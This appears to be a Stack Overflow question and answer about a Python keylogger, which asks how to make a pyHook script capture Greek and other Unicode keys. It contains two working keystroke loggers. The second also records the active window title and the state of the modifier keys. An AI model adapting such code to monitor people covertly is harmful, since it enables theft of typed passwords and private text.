# Can I read Unicode values using pyHook?

Tags: python, unicode, keylogger, pyhook, pythoncom

I created a simple keylogging program. Everything that is typed on keyboard is sent to a log.txt file. The problem is that my code works only for ASCII code.
When I type greek characters , they get treated as english.

I want my code to:

1. Accept Greek characters or other languages,too (Generally all kind of characters)
2. Log events such us Alt, Ctrl etc

My code so far:

```
import pyHook , pythoncom , sys , logging , os

file_log = "C:\\Users\\admin\\Desktop\\New folder\\log.txt"
f = open(file_log , 'w')
try:
    f.seek(0)
    f.truncate()
finally:
    f.close()

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log,level = logging.DEBUG , format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    key = chr(event.Ascii)
    print key
    if (key == 'p'):
            os.startfile("C:\\Users\\admin\\Desktop\\New folder\\log.txt")
            sys.exit()
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Should my program accept Unicode?

How can it do so?

Comment: How are you testing this?

Comment: @RadLexus I check my log.txt file. I will add the errors I get from typing greek characters

Comment: I meant that last part. How do you type Greek characters? Do you have a Greek keyboard driver?

Comment: yes !! It's my second language on my pc. I switch with shift+alt

Answer (score 0):

I would suggest you using a different module. I've tried using PyHook myself, but this caused issues with me while pressing deadkeys ('`^) Usually other languages which use special letters like á, contain deadkeys. PyHook doesn't handle them well. The module I'm using currently is [keyboard](https://github.com/boppreh/keyboard#api). Keyboard handles deadkeys properly, and doesn't show some weird behaviour while being encountered with them. Maybe keyboard is a solution for you as well. An example for using keyboard is the following:

```
from keyboard import on_press, on_release, wait
from win32gui import GetWindowText, GetForegroundWindow
from datetime import datetime

def display(event, key):
    global ctrlpressed, shiftpressed, lastwindow
    if lastwindow != GetWindowText(GetForegroundWindow()):
        lastwindow = GetWindowText(GetForegroundWindow())
        print("New Window: " + lastwindow)
    print('{0:8} {1:3} {2:5} {3:5} {4}'.format(datetime.fromtimestamp(event.time).strftime('%H:%M:%S'), event.scan_code, str(ctrlpressed), str(shiftpressed), key))

def KeyPressed(event):
    global ctrlpressed, shiftpressed
    if(event.name == 'left shift' or event.name == 'right shift'):
        shiftpressed = True;
    elif(event.name == 'left ctrl' or event.name == 'right ctrl'):
        ctrlpressed = True;
    else:
        display(event, event.name)

def KeyReleased(event):
    global ctrlpressed, shiftpressed
    if(event.name == 'left shift' or event.name == 'right shift'):
        shiftpressed = False;
    elif(event.name == 'left ctrl' or event.name == 'right ctrl'):
        ctrlpressed = False;

ctrlpressed = shiftpressed = False;
lastwindow = "";
on_press(KeyPressed)
on_release(KeyReleased)
wait()
```

Tested on Python 3.5